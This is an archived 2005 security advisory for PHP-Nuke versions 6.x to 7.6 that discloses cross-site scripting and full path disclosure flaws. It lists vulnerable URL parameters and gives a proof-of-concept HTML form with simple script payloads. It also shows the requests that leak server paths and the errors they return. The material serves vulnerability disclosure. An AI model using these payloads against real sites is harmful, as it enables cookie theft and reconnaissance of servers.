PHPNukeXSS.txt

2005-04-17T00:00:00
ID PACKETSTORM:36972
Type packetstorm
Reporter sp3x
Modified 2005-04-17T00:00:00

Description

                                        
                                            `  
  
-=[ SecurityReason-2005-SRA#04 ]=-  
  
-=[ Full path disclosure and XSS in PHPNuke ]=-  
  
Author: sp3x  
Date: 3. April 2005  
  
In Memory of John Poul II :  
===========================  
  
"Love converts hearts and gives peace," - John Poul II [The Great]  
"To miłość nawraca serca i daruje pokój ludzkości, która wydaje się czasem zagubiona i   
  
zdominowana przez siłę zła, egoizmu i strachu" - Jan Paweł II [WIELKI]  
  
Affected software :  
===================  
PHP-Nuke version : 6.x - 7.6  
  
Description :  
=============  
PHP-Nuke is a Web Portal System, storytelling software, News system, online community or   
  
whatever you want to call it. The goal of PHP-Nuke is to have an automated web site to   
  
distribute news and articles with users system. Each user can submit comments to discuss the   
  
articles, just similar to Slashdot and many others. Main features include: web based admin,   
  
surveys, top page, access stats page with counter, user customizable box, themes manager for   
  
registered users, friendly administration GUI with graphic topic manager, option to edit or   
  
delete stories, option to delete comments, moderation system, Referers page to know who link   
  
us, sections manager, customizable HTML blocks, user and authors edit, an integrated Banners   
  
Ads system, search engine, backend/headlines generation (RSS/RDF format), and many, many more   
  
friendly functions. PHP-Nuke is written 100% in PHP and requires Apache Web server, PHP and a   
  
SQL (MySQL, mSQL, PostgreSQL, ODBC, ODBC_Adabas, Sybase or Interbase). Support for 25   
  
languages, Yahoo like search engine, Comments option in Polls, lot of themes, Ephemerids   
  
manager, File Manager, Headlines, download manager, faq manager, advanced blocks systems,   
  
reviews system, newsletter, categorized articles, multilanguage content management, phpBB   
  
Forums included and a lot more.  
  
Vulnerabilities :  
*****************  
  
Cross-site scripting - XSS :  
============================  
  
In PHPNuke there are XSS that can be used to steal cookies and do other operations, which in  
normal conditions are not permitted by browser's cross-domain security restrictions.   
  
Example :  
=========   
  
http://[target]/[nuke_dir]/modules.php?name=Search&author=[author]&topic=0&min=999999999[XSS]&q  
  
uery=[our query]  
http://[target]/[nuke_dir]/modules.php?name=Search&author=[author]&topic=0&min=999999999[XSS]&q  
  
uery=[our_query]&type=users&category=2  
http://[target]/[nuke_dir]/modules.php?name=Search&author=[author]&topic=0&min=999999999[XSS]&q  
  
uery=[our_query]&type=comments&category=2  
http://[target]/[nuke_dir]/modules.php?name=Search&author=[author]&topic=0&min=999999999[XSS]&q  
  
uery=[our_query]&type=stories&category=2  
http://[target]/[nuke_dir]/modules.php?name=Search&author=[author]&topic=0&min=999999999[XSS]&q  
  
uery=[our_query]&type=reviews&category=2  
http://[target]/[nuke_dir]/modules.php?name=FAQ&myfaq=yes&id_cat=1&categories=45435[XSS]  
http://[target]/[nuke_dir]/banners.php?op=EmailStats&login=[our_login]&cid=1&bid=[XSS]  
http://[target]/[nuke_dir]/modules.php?name=Encyclopedia&file=index&op=terms&eid=1&ltr=[XSS]  
  
To test XSS for example in   
  
http://[target]/[nuke_dir]/modules.php?name=Encyclopedia&file=index&op=terms&eid=1&ltr=[XSS] we   
  
can  
create a form.   
  
test.html :  
-----------  
<form name="mantra" method="POST" action="http://[target]/[nuke_dir]/modules.php">  
<p>XSS:   
<input type="text" name="newdownloadshowdays" value="7">  
<br>  
<input type="hidden" name="name" value="Downloads">  
<br>  
<input type="hidden" name="d_op" value="NewDownloads">  
</p>  
<p>  
<input type="submit" name="Submit" value="Go!">  
<br>  
</p>  
</form>  
-----------------  
And enter to inputfield "XSS" this :<body onload="alert('XSS')";> and click "Go!" :)  
Or just replace [XSS] with <h1>w33t</h1> in GET method  
  
Full Path Disclosure :  
======================  
  
Full path to script must be kept in secret because it can lead to successful attack on the  
website. If the attacker know Full path to script , he can start searching some more info on   
  
others folders or about the server where the site is and then try to break in.  
  
Many scripts can be accessed directly and this will provoke standard  
php error messages, which leads to full path disclosure.   
  
Examples :  
----------  
  
http://[target]/[nuke_dir]/modules.php?name=Your_Account&op=userinfo  
  
Error message :  
---------------  
=====================================  
Fatal error: Call to undefined function: nav() in   
  
/[info]/public_html/phpnuke/modules/Your_Account/index.php on line 221  
  
======================================  
  
http://[target]/[nuke_dir]/modules.php?name=Your_Account&op=my_headlines  
  
Error message :  
---------------  
=====================================  
Warning: fsockopen(): php_network_getaddresses: getaddrinfo failed: Name or service not known   
  
in /[info]/public_html/phpnuke/modules/Your_Account/index.php on line 1548  
  
Warning: fsockopen(): unable to connect to :80 in   
  
/[info]/public_html/phpnuke/modules/Your_Account/index.php on line 1548  
=====================================  
  
http://[target]/[nuke_dir]/modules.php?name=Encyclopedia&file=index&op=search  
  
=======================================  
Fatal error: Call to undefined function: search() in   
  
/[info]/www/phpnuke/html/modules/Encyclopedia/index.php on line 267  
======================================  
  
How to fix :  
============  
  
Download the new version of the script or update.  
Because phpnuke don't have security contact, you can download fix from   
www.securityreason.com/patch/SecurityReason-Fix[1].rar  
Also on www.nukefixes.com the fix will be avaible soon   
  
Contact :  
=========  
  
sp3x[at]securityreason[dot].com  
www.securityreason.com  
`